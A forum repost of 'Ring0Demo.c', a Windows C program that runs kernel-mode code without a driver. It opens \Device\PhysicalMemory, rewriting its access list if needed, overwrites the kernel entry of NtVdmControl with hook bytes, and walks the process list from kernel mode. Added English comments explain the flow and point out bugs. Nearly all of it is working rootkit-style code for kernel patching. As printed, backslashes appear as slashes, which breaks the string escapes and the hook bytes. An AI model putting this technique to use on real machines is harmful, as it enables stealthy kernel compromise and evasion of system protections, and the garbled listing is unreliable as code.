zzzevazzz给出的是好东东,不放上来可惜:
改了调用pfnMemcpy处蓝屏的代码,直接调用memcpy. Thanks for sharing...

//************************************************************************
// Ring0Demo.c v1.0 by zzzEVAzzz
// 目的:演示无驱动执行Ring0代码。
// 原理:通过/Device/PhysicalMemory修改NtVdmControl入口,跳转到Ring0Code
//************************************************************************
#include <stdio.h>
#include <Windows.h>
#include <Ntsecapi.h>
#include <Aclapi.h>

#pragma comment (lib,"ntdll.lib")       // Copy From DDK
#pragma comment (lib,"Kernel32.lib")
#pragma comment (lib,"Advapi32.lib")

//------------------ 数据类型声明开始 --------------------//
// One record of the SystemModuleInformation (class 11) result.  GetModuleBase()
// below reads only Base, ModuleNameOffset and ImageName: ImageName holds the
// module path and ModuleNameOffset is the index of the bare file name inside
// it.  This is the 32-bit layout; the remaining fields are unused here.
typedef struct _SYSTEM_MODULE_INFORMATION {
    ULONG Reserved[2];
    PVOID Base;                 // kernel-mode load address of the module
    ULONG Size;
    ULONG Flags;
    USHORT Index;
    USHORT Unknown;
    USHORT LoadCount;
    USHORT ModuleNameOffset;    // index of the file-name part within ImageName
    CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

// Object attributes for the Zw* open calls; populated by the
// InitializeObjectAttributes() macro defined further down.
typedef struct _OBJECT_ATTRIBUTES {
    ULONG Length;
    HANDLE RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;

// InheritDisposition argument of ZwMapViewOfSection.
typedef enum _SECTION_INHERIT {
    ViewShare = 1,
    ViewUnmap = 2
} SECTION_INHERIT;

// One record produced per process by Ring0Code() and printed by
// ListProcessInfo().  Name receives a raw 16-byte copy and is not
// NUL-terminated by the producer; Reserved is never written, and since main()
// allocates the buffer with LPTR (zeroed) it is what terminates Name for the
// "%s" in ListProcessInfo().
typedef struct _MY_PROCESS_INFO {
    ULONG PID;
    ULONG KPEB;     // kernel address of the process object (called KPEB in this file)
    ULONG CR3;      // value read at offset 0x18 of the process object
    CHAR Name[16];  // image name field copied out of the process object
    ULONG Reserved;
} MY_PROCESS_INFO, *PMY_PROCESS_INFO;

typedef long NTSTATUS;  // 32-bit status code; negative values are failures (see NT_SUCCESS)
//------------------ 数据类型声明结束 --------------------//

//--------------------- 预定义开始 -----------------------//
// NTSTATUS failure codes have the sign bit set, so success is "non-negative".
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
// Status values this file tests or returns.  They are unsigned literals
// compared against a signed NTSTATUS; on the 32-bit build this code assumes,
// the comparison promotes to unsigned and matches the kernel's values.
#define STATUS_SUCCESS              0x00000000
#define STATUS_UNSUCCESSFUL         0xC0000001
#define STATUS_NOT_IMPLEMENTED      0xC0000002
#define STATUS_INFO_LENGTH_MISMATCH 0xC0000004
#define STATUS_INVALID_PARAMETER    0xC000000D
#define STATUS_ACCESS_DENIED        0xC0000022
#define STATUS_BUFFER_TOO_SMALL     0xC0000023
#define OBJ_KERNEL_HANDLE           0x00000200
// ZwQuerySystemInformation class: list of loaded kernel modules.
#define SystemModuleInformation     11

// Fills an OBJECT_ATTRIBUTES.  Written as a plain brace block rather than
// do { } while (0), so the ';' at the call site is an extra empty statement;
// do not use it as the sole body of an if/else.
#define InitializeObjectAttributes( p, n, a, r, s ) { (p)->Length = sizeof( OBJECT_ATTRIBUTES ); (p)->RootDirectory = r;(p)->Attributes = a;(p)->ObjectName = n;(p)->SecurityDescriptor = s;(p)->SecurityQualityOfService = NULL;}
//--------------------- 预定义结束 -----------------------//

//------------------ Native API声明开始 ------------------//
// ntdll.dll exports (linked via the ntdll.lib pragma above).  These are the
// user-mode stubs; the prototypes are hand-written because the SDK headers
// used here do not declare them.

// Initialise a counted UNICODE_STRING from a NUL-terminated wide string.
NTSYSAPI
VOID
NTAPI
RtlInitUnicodeString(
    PUNICODE_STRING DestinationString,
    PCWSTR SourceString
    );

// Generic system query; used with SystemModuleInformation in GetModuleBase().
// Returns STATUS_INFO_LENGTH_MISMATCH with the required size in ReturnLength
// when the buffer is too small.
NTSYSAPI
NTSTATUS
NTAPI
ZwQuerySystemInformation(
    ULONG SystemInformationClass,
    PVOID SystemInformation,
    ULONG SystemInformationLength,
    PULONG ReturnLength
    );

// Open an existing section object by name (OpenPhysicalMemory()).
NTSYSAPI
NTSTATUS
NTAPI
ZwOpenSection(
    OUT PHANDLE SectionHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes
    );

// Map part of a section into a process.  ViewSize is declared PULONG here,
// while MapPhysicalMemory() passes a SIZE_T*; those have the same width only
// on a 32-bit build, which is what this file assumes throughout.
NTSYSAPI
NTSTATUS
NTAPI
ZwMapViewOfSection(
    IN HANDLE SectionHandle,
    IN HANDLE ProcessHandle,
    IN OUT PVOID *BaseAddress,
    IN ULONG ZeroBits,
    IN ULONG CommitSize,
    IN OUT PLARGE_INTEGER SectionOffset OPTIONAL,
    IN OUT PULONG ViewSize,
    IN SECTION_INHERIT InheritDisposition,
    IN ULONG AllocationType,
    IN ULONG Protect
    );

// Unmap a view; the first argument is a *process* handle, not the section.
NTSYSAPI
NTSTATUS
NTAPI
ZwUnmapViewOfSection(
    IN HANDLE ProcessHandle,
    IN PVOID BaseAddress
    );

NTSYSAPI
NTSTATUS
NTAPI
ZwClose(
    IN HANDLE Handle
    );

// User-mode stub of the system call whose kernel-side entry main() patches;
// calling it after the patch is what transfers control to Ring0Code().
NTSYSAPI
NTSTATUS
NTAPI
NtVdmControl(
    IN ULONG ControlCode,
    IN PVOID ControlData
    );
//------------------ Native API声明结束 ------------------//

//------------------ 全局变量定义开始 --------------------//
// Pointers to ntoskrnl.exe routines and one variable.  main() resolves them
// by name from a user-mode LoadLibrary() copy of ntoskrnl.exe and then adds
// the (kernel base - user-mode base) delta, so from that point on they hold
// kernel-mode addresses: only Ring0Code(), which runs in kernel context, may
// call through them.  pfnNtVdmControl and pfnPsGetCurrentProcessId are used
// solely to compute the displacements patched into HookCode.
NTSTATUS
(NTAPI *pfnNtVdmControl)(
    IN ULONG ControlCode,
    IN PVOID ControlData
    );

BOOLEAN
(NTAPI *pfnPsGetVersion)(
    PULONG MajorVersion OPTIONAL,
    PULONG MinorVersion OPTIONAL,
    PULONG BuildNumber OPTIONAL,
    PUNICODE_STRING CSDVersion OPTIONAL
    );

HANDLE
(NTAPI *pfnPsGetCurrentProcessId)(
    );

// Resolved in main() but no longer called: Ring0Code() uses the CRT memcpy
// instead (the note at the top of the page says the pfnMemcpy call crashed).
PVOID
(NTAPI *pfnMemcpy)(
    IN VOID UNALIGNED *Destination,
    IN CONST VOID UNALIGNED *Source,
    IN SIZE_T Length
    );

ULONG
(_cdecl *pfnDbgPrint)(
    IN PCHAR Format,
    ...
    );

// Kernel variable holding the address of the System process object;
// Ring0Code() dereferences it once to find the head of the process list.
ULONG *pPsInitialSystemProcess;
//------------------ 全局变量定义结束 --------------------//

// 获取指定模块的基址
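// Return the kernel-mode load address of the kernel module whose file name
// equals `name` (case-insensitive), or NULL if it is not listed, `name` is
// NULL, or a query fails.  Uses ZwQuerySystemInformation with
// SystemModuleInformation, whose result is a ULONG record count followed by
// that many SYSTEM_MODULE_INFORMATION records.  Failures are printed to
// stdout; the caller only sees NULL.
//
// Fixes relative to the original: the "/n" in the messages (the listing's
// backslashes were mangled to '/') is restored to "\n"; DWORD/ULONG values
// are printed with %lu; a record whose ModuleNameOffset would index past
// ImageName is skipped instead of read out of bounds; and the record pointer
// is derived with byte arithmetic rather than a pointer-to-ULONG cast.
PVOID GetModuleBase(PCSTR name)
{
    NTSTATUS status;
    PVOID pBuffer;
    PVOID pModule = NULL;
    ULONG nRetSize = 0, i, n;
    PSYSTEM_MODULE_INFORMATION pmi;

    if (NULL == name)
    {
        return NULL;
    }

    // First attempt with one page; on STATUS_INFO_LENGTH_MISMATCH the call
    // reports the size it needs in nRetSize.
    pBuffer = LocalAlloc(LPTR, 0x1000);
    if (NULL == pBuffer)
    {
        printf("LocalAlloc[0] Failed: %lu\n", GetLastError());
        return NULL;
    }

    status = ZwQuerySystemInformation(SystemModuleInformation, pBuffer, 0x1000, &nRetSize);
    if (STATUS_INFO_LENGTH_MISMATCH == status)
    {
        // Buffer too small: reallocate at the reported size and retry once.
        LocalFree(pBuffer);
        pBuffer = LocalAlloc(LPTR, nRetSize);
        if (NULL == pBuffer)
        {
            printf("LocalAlloc[1] Failed: %lu\n", GetLastError());
            return NULL;
        }
        status = ZwQuerySystemInformation(SystemModuleInformation, pBuffer, nRetSize, &nRetSize);
    }
    if (!NT_SUCCESS(status))
    {
        // A second length mismatch (module list grew in between) ends here too.
        printf("ZwQuerySystemInformation Failed: %lu\n", LsaNtStatusToWinError(status));
        LocalFree(pBuffer);
        return NULL;
    }

    // Result layout: ULONG count, then `count` records.
    n = *(ULONG*)pBuffer;
    pmi = (PSYSTEM_MODULE_INFORMATION)((PUCHAR)pBuffer + sizeof(ULONG));

    for (i = 0; i < n; i++, pmi++)
    {
        // ModuleNameOffset indexes ImageName; never follow one past the array.
        if (pmi->ModuleNameOffset >= sizeof(pmi->ImageName))
        {
            continue;
        }
        if (0 == _stricmp(pmi->ImageName + pmi->ModuleNameOffset, name))
        {
            pModule = pmi->Base;
            break;
        }
    }

    LocalFree(pBuffer);
    return pModule;
}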

// 获取/Device/PhysicalMemory的可读写句柄
// Obtain a handle to the physical-memory section with SECTION_MAP_READ |
// SECTION_MAP_WRITE.  (The object path below is printed with '/' in this
// listing, as is the header comment, so the backslashes of the original
// source appear to have been replaced during extraction.)
//
// Flow: try the open directly; if it fails with STATUS_ACCESS_DENIED, open
// the object for READ_CONTROL | WRITE_DAC instead, append an ACE granting the
// current user map access, write the DACL back and open again.  That fallback
// only succeeds for a caller that already holds WRITE_DAC on the object, i.e.
// an administrator, so this is not a privilege escalation.  Nothing in this
// file reverts the DACL change, so it presumably stays in effect until reboot
// and is itself an observable modification of a kernel object's security.
//
// Returns the section handle (caller closes it with ZwClose) or NULL after
// printing the failing call.
//
// NOTE(review): pSD is never initialised.  The `goto FreeAndExit` on the
// first successful open, and on the two failures before GetSecurityInfo, reach
// `if (pSD) LocalFree(pSD)` with an indeterminate pointer (undefined
// behaviour); it should start as NULL like pDacl and pNewDacl.
HANDLE OpenPhysicalMemory()
{
    DWORD dwRet;
    NTSTATUS status;
    UNICODE_STRING name;
    OBJECT_ATTRIBUTES oa;
    EXPLICIT_ACCESS ea;
    PSECURITY_DESCRIPTOR pSD;
    PACL pDacl = NULL;
    PACL pNewDacl = NULL;
    HANDLE hSection = NULL;     // READ_CONTROL|WRITE_DAC handle, closed on exit
    HANDLE hSectionRet = NULL;  // map read/write handle returned to the caller

RtlInitUnicodeString(&name, L"//Device//PhysicalMemory");
    InitializeObjectAttributes(&oa, &name, OBJ_KERNEL_HANDLE, NULL, NULL);

    // Open PhysicalMemory with read/write section access.
    status = ZwOpenSection(&hSectionRet, SECTION_MAP_READ | SECTION_MAP_WRITE, &oa);

if (NT_SUCCESS(status)) goto FreeAndExit; // opened directly; return it

if (status != STATUS_ACCESS_DENIED)
    {
        // Failed for a reason other than missing rights: give up.
        printf("ZwOpenSection[0] Failed: %d/n", LsaNtStatusToWinError(status));
        hSectionRet = NULL;
        goto FreeAndExit;
    }

    // Open PhysicalMemory with rights to read and rewrite its DACL.
    status = ZwOpenSection(&hSection, READ_CONTROL | WRITE_DAC, &oa);
    if (!NT_SUCCESS(status))
    {
        printf("ZwOpenSection[1] Failed: %d/n", LsaNtStatusToWinError(status));
        goto FreeAndExit;
    }

    // Read the current DACL (pSD owns the returned descriptor).
    dwRet = GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION,
        NULL, NULL, &pDacl, NULL, &pSD);
    if (dwRet != ERROR_SUCCESS)
    {
        printf("GetSecurityInfo Failed: %d/n", dwRet);
        goto FreeAndExit;
    }

    // Build an ACE granting the current user read/write map access.
    ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
    ea.grfAccessPermissions = SECTION_MAP_READ | SECTION_MAP_WRITE;
    ea.grfAccessMode = GRANT_ACCESS;
    ea.grfInheritance = NO_INHERITANCE;
    ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;
    ea.Trustee.TrusteeType = TRUSTEE_IS_USER;
    ea.Trustee.ptstrName = "CURRENT_USER";

    // Merge the ACE into a copy of the DACL (pNewDacl is freed on exit).
    dwRet = SetEntriesInAcl(1, &ea, pDacl, &pNewDacl);
    if (dwRet != ERROR_SUCCESS)
    {
        printf("SetEntriesInAcl Failed: %d/n", dwRet);
        goto FreeAndExit;
    }

    // Write the new DACL back onto the object.
    dwRet = SetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION,
        NULL, NULL, pNewDacl, NULL);
    if (dwRet != ERROR_SUCCESS)
    {
        printf("SetSecurityInfo Failed: %d/n", dwRet);
        goto FreeAndExit;
    }

    // Retry the read/write open now that the DACL allows it.
    status = ZwOpenSection(&hSectionRet, SECTION_MAP_READ | SECTION_MAP_WRITE, &oa);
    if (!NT_SUCCESS(status))
    {
        printf("ZwOpenSection[2] Failed: %d/n", LsaNtStatusToWinError(status));
        goto FreeAndExit;
    }

FreeAndExit:
    if (pSD) LocalFree(pSD);
    if (pNewDacl) LocalFree(pNewDacl);
    if (hSection) ZwClose(hSection);
    return hSectionRet;
}

// 将物理内存映射到当前进程的用户空间
// Map CommitSize bytes of physical memory starting at physical address Offset
// into this process ((HANDLE)-1 = current process) as PAGE_READWRITE.
// Returns the view's base address, or NULL after printing the status.  The
// caller is responsible for unmapping (see main()).
//
// Offset is a 32-bit ULONG placed in the low half of a LARGE_INTEGER, so only
// the first 4 GiB of physical memory is reachable.  ViewSize is a SIZE_T
// passed where the prototype above declares PULONG; that is the same width
// only on a 32-bit build.
PVOID MapPhysicalMemory(HANDLE hSection, // section handle for physical memory
                        ULONG Offset,    // physical address at which the view starts
                        ULONG CommitSize // length of the view in bytes
                        )
{
    NTSTATUS status;
    PVOID BaseAddress = NULL;   // NULL lets the kernel pick the virtual address
    LARGE_INTEGER PhysicalAddress = {Offset, 0};
    SIZE_T ViewSize = CommitSize;

status = ZwMapViewOfSection(hSection, (HANDLE)-1, &BaseAddress, 0,
        CommitSize, &PhysicalAddress, &ViewSize, ViewShare, 0, PAGE_READWRITE);
    if (!NT_SUCCESS(status))
    {
        printf("ZwMapViewOfSection Failed: %d/n", LsaNtStatusToWinError(status));
        return NULL;
    }

return BaseAddress;
}

// 在Ring0执行的代码。这里演示如何获取每个进程的PID、KPEB、CR3和ImageName
// Runs in kernel mode: main() temporarily rewrites the kernel entry of
// NtVdmControl so that a call from this process lands here.  The two
// parameters mirror NtVdmControl's (ControlCode, ControlData) so the stack is
// balanced on return; main() passes the buffer length as the first and the
// buffer as the second.
//
// Walks the process list starting at the System process and writes one
// MY_PROCESS_INFO per process into `buffer` after a leading ULONG count.
// Returns STATUS_NOT_IMPLEMENTED for an unrecognised build number,
// STATUS_BUFFER_TOO_SMALL / STATUS_INVALID_PARAMETER for bad arguments, and
// STATUS_SUCCESS otherwise.  All kernel routines are reached through the
// pointers main() relocated into the kernel image; memcpy is the only call
// that resolves to this program's own CRT (the note at the top of the page
// says it replaced the crashing pfnMemcpy call).
//
// NOTE(review): the loop condition tests ListPtr->Flink, so the entry whose
// Flink is the head (the last process in the list) is never emitted; a
// do/while over `ListPtr != ListHead` would include it.
NTSTATUS Ring0Code(ULONG size,      // buffer length in bytes
                   PULONG buffer)   // caller-allocated output buffer
                                    // (same arity as NtVdmControl so the stack balances)
{
    ULONG BuildNumber;
    ULONG ListOffset;   // offset of ActiveProcessLinks within the process object
    ULONG PIDOffset;    // offset of the process-ID field
    ULONG NameOffset;   // offset of the 16-byte image-name field
    PLIST_ENTRY ListHead, ListPtr;
    PMY_PROCESS_INFO mypi;

pfnDbgPrint("Run in Ring0!/n"); // debug trace through the kernel's DbgPrint

pfnPsGetVersion(NULL, NULL, &BuildNumber, NULL);
    pfnDbgPrint("BuildNumber = %d/n", BuildNumber);

switch (BuildNumber)    // process-object layout differs per build; offsets are hard-coded
    {
        case 2195:  // Windows 2000
            ListOffset = 0xa0;
            PIDOffset = 0x9c;
            NameOffset = 0x1fc;
            break;
        case 2600:  // Windows XP
            ListOffset = 0x88;
            PIDOffset = 0x84;
            NameOffset = 0x174;
            break;
        case 3790:  // Windows Server 2003
            ListOffset = 0x88;
            PIDOffset = 0x84;
            NameOffset = 0x154;
            break;
        default:
            return STATUS_NOT_IMPLEMENTED;  // unknown build: refuse rather than guess offsets
    }

if (size<4) return STATUS_BUFFER_TOO_SMALL;
    size -= 4;      // reserve the leading count

if (NULL == buffer) return STATUS_INVALID_PARAMETER;
    *buffer = 0L;   // first ULONG of the buffer holds the number of records

mypi = (PMY_PROCESS_INFO)(buffer + 1);

    // Walk ActiveProcessLinks from the System process; size is the remaining
    // room in the caller's buffer and is checked before every record.
    ListHead = ListPtr = (PLIST_ENTRY)(*pPsInitialSystemProcess + ListOffset);
    while (ListPtr->Flink != ListHead)
    {
        if (size < sizeof(MY_PROCESS_INFO)) return STATUS_BUFFER_TOO_SMALL;

mypi->KPEB = (ULONG)ListPtr - ListOffset;       // back from the link to the object base
        mypi->PID = *(ULONG*)(mypi->KPEB + PIDOffset);
        mypi->CR3 = *(ULONG*)(mypi->KPEB + 0x18);   // same offset for all three builds above
        //pfnMemcpy(mypi->Name, (PVOID)(mypi->KPEB + NameOffset), 16);
        memcpy(mypi->Name, (PVOID)(mypi->KPEB + NameOffset), 16);   // raw copy, no NUL added

(*buffer)++;
        mypi++;
        size -= sizeof(MY_PROCESS_INFO);
        ListPtr = ListPtr->Flink;
    }

return STATUS_SUCCESS;
}

// 显示进程信息
// Print the records produced by Ring0Code(): buffer[0] is the record count,
// followed by that many MY_PROCESS_INFO entries.  "%s" on Name relies on a
// zero byte following the 16 name bytes (Reserved, which the producer never
// writes and main() allocates zeroed).
void ListProcessInfo(PULONG buffer)
{
    ULONG count = *buffer;
    PMY_PROCESS_INFO entry = (PMY_PROCESS_INFO)(buffer + 1);
    PMY_PROCESS_INFO end = entry + count;

    printf(" PID   KPEB      CR3       Name/n"
           " ----  --------  --------  ----/n");
    for (; entry < end; entry++)
    {
        printf(" %-4d  %08x  %08x  %s/n",
            entry->PID, entry->KPEB, entry->CR3, entry->Name);
    }
}

// Entry point.  Sequence: find the kernel's load address, resolve routine
// addresses from a user-mode copy of ntoskrnl.exe, fill in HookCode, obtain a
// physical-memory handle and map the pages holding NtVdmControl's kernel
// entry, overwrite that entry, call NtVdmControl so Ring0Code() runs, restore
// the original bytes and print the collected records.
//
// Preconditions visible here: a 32-bit kernel loaded between 0x80000000 and
// 0x9FFFFFFF (checked below) and the rights needed by OpenPhysicalMemory(),
// whose DACL fallback requires WRITE_DAC on the object, i.e. an administrator.
// That DACL change is not reverted on exit.
//
// NOTE(review): throughout this listing every '\' shows as '/', so the "/x.."
// bytes of HookCode and every "/n" are literal characters as printed, and the
// HookCode initialiser is longer than its 24-byte array.  The original source
// presumably used '\' escapes.
//
// NOTE(review): `(ULONG)pfnX += offset` assigns through a cast, an MSVC
// extension rather than standard C, and `void main()` is non-standard.
void main()
{
    char *Kernel = "ntoskrnl.exe";
    PVOID pKernel = NULL;     // kernel-mode load address of ntoskrnl.exe
    HMODULE hKernel = NULL;   // user-mode LoadLibrary() copy of the same image
    HANDLE hSection = NULL;   // physical-memory section handle
    char *mapping = NULL;     // view of the pages holding NtVdmControl's entry
    PVOID buffer = NULL;      // zeroed output buffer filled by Ring0Code()
    ULONG offset;
    NTSTATUS status;
    // Bytes written over the kernel entry of NtVdmControl; the three
    // placeholders (0xffffffff, 0xeeeeeeee, 0xdddddddd) are patched below.
    char OrigCode[24], HookCode[24] =
        "/xE8/xFF/xFF/xFF/xFF"  // call 0xffffffff      ;nt!PsGetCurrentProcessId
        "/x3D/xEE/xEE/xEE/xEE"  // cmp eax, 0xeeeeeeee  ;own PID
        "/x75/x05"              // jne $+5
        "/xE9/xDD/xDD/xDD/xDD"  // jmp 0xdddddddd       ;Ring0Code
        "/xB8/x01/x00/x00/xC0"  // mov eax, 0xc0000001  ;STATUS_UNSUCCESSFUL
        "/xC3";                 // ret

printf("/n -=< Run Ring0 Code Without Driver Demo >=-/n/n");

    // Kernel-mode base of ntoskrnl.exe.
    pKernel = GetModuleBase(Kernel);
    if (NULL == pKernel) return;
    if ((ULONG)pKernel < 0x80000000 || (ULONG)pKernel > 0x9FFFFFFF)
    {
        // Base outside the range the physical-page computation below relies on.
        printf("Error: Kernel module base (%08x) is out of range./n", pKernel);
        return;
    }

    // Load a user-mode copy of ntoskrnl.exe to resolve its exports by name.
    hKernel = LoadLibrary(Kernel);
    if (NULL == hKernel)
    {
        printf("LoadLibrary Failed: %d/n", GetLastError());
        return;
    }

    // Export addresses within the user-mode copy; converted to kernel
    // addresses below.  (The `if (...);` with an empty true branch is
    // deliberate but easy to misread.)
    if ((pfnMemcpy = (PVOID)GetProcAddress(hKernel, "memcpy")) &&
        (pfnDbgPrint = (PVOID)GetProcAddress(hKernel, "DbgPrint")) &&
        (pfnNtVdmControl = (PVOID)GetProcAddress(hKernel, "NtVdmControl")) &&
        (pfnPsGetVersion = (PVOID)GetProcAddress(hKernel, "PsGetVersion")) &&
        (pfnPsGetCurrentProcessId = (PVOID)GetProcAddress(hKernel, "PsGetCurrentProcessId")) &&
        (pPsInitialSystemProcess = (PVOID)GetProcAddress(hKernel, "PsInitialSystemProcess")));
    else
    {
        printf("GetProcAddress Failed: %d/n", GetLastError());
        goto FreeAndExit;
    }

    // Kernel address = user-mode address + (kernel base - user-mode base).
    offset = (ULONG)pKernel - (ULONG)hKernel;
    (ULONG)pfnMemcpy += offset;
    (ULONG)pfnDbgPrint += offset;
    (ULONG)pfnNtVdmControl += offset;
    (ULONG)pfnPsGetVersion += offset;
    (ULONG)pfnPsGetCurrentProcessId += offset;
    (ULONG)pPsInitialSystemProcess += offset;

    // Patch HookCode's placeholders: two relative displacements and the PID.
    *(ULONG*)(HookCode+1) = (ULONG)pfnPsGetCurrentProcessId - (ULONG)pfnNtVdmControl - 5;
    *(ULONG*)(HookCode+6) = GetCurrentProcessId();
    *(ULONG*)(HookCode+13) = (ULONG)Ring0Code - (ULONG)pfnNtVdmControl - 17;

    // Section handle for physical memory (may rewrite the object's DACL).
    hSection = OpenPhysicalMemory();
    if (NULL == hSection) goto FreeAndExit;

    // Map the two pages holding NtVdmControl's entry.  Masking the virtual
    // address presumes the kernel image lies in the region mapped 1:1 onto
    // physical memory, which the base-range check above is meant to ensure.
    offset = (ULONG)pfnNtVdmControl & 0x1FFFF000;   // physical page address
    mapping = MapPhysicalMemory(hSection, offset, 0x2000);
    if (NULL == mapping) goto FreeAndExit;

    // Save the entry bytes so they can be put back after the call.
    offset = (ULONG)pfnNtVdmControl & 0x00000FFF;   // offset within the page
    memcpy(OrigCode, mapping+offset, 24);

buffer = LocalAlloc(LPTR, 0x1000);   // LPTR: zero-filled
    if (NULL == buffer)
    {
        printf("LocalAlloc Failed: %d/n", GetLastError());
        goto FreeAndExit;
    }

    // Hook window: every caller of NtVdmControl system-wide sees the patched
    // entry between these two memcpy calls.  0x1000 travels as ControlCode
    // and reaches Ring0Code() as the buffer size.
memcpy(mapping+offset, HookCode, 24);   // hook NtVdmControl
    status = NtVdmControl(0x1000, buffer);  // call NtVdmControl -> Ring0Code()
    memcpy(mapping+offset, OrigCode, 24);   // restore the original entry

if (!NT_SUCCESS(status))
    {
        printf("NtVdmControl Failed: %d/n", LsaNtStatusToWinError(status));
        goto FreeAndExit;
    }

ListProcessInfo(buffer);

    // NOTE(review): ZwUnmapViewOfSection takes a process handle (see the
    // prototype above) and MapPhysicalMemory() mapped into (HANDLE)-1; passing
    // hSection here presumably fails, leaving the view mapped until exit.
FreeAndExit:
    if (buffer != NULL) LocalFree(buffer);
    if (mapping != NULL) ZwUnmapViewOfSection(hSection, mapping);
    if (hSection != NULL) ZwClose(hSection);
    if (hKernel != NULL) FreeLibrary(hKernel);
}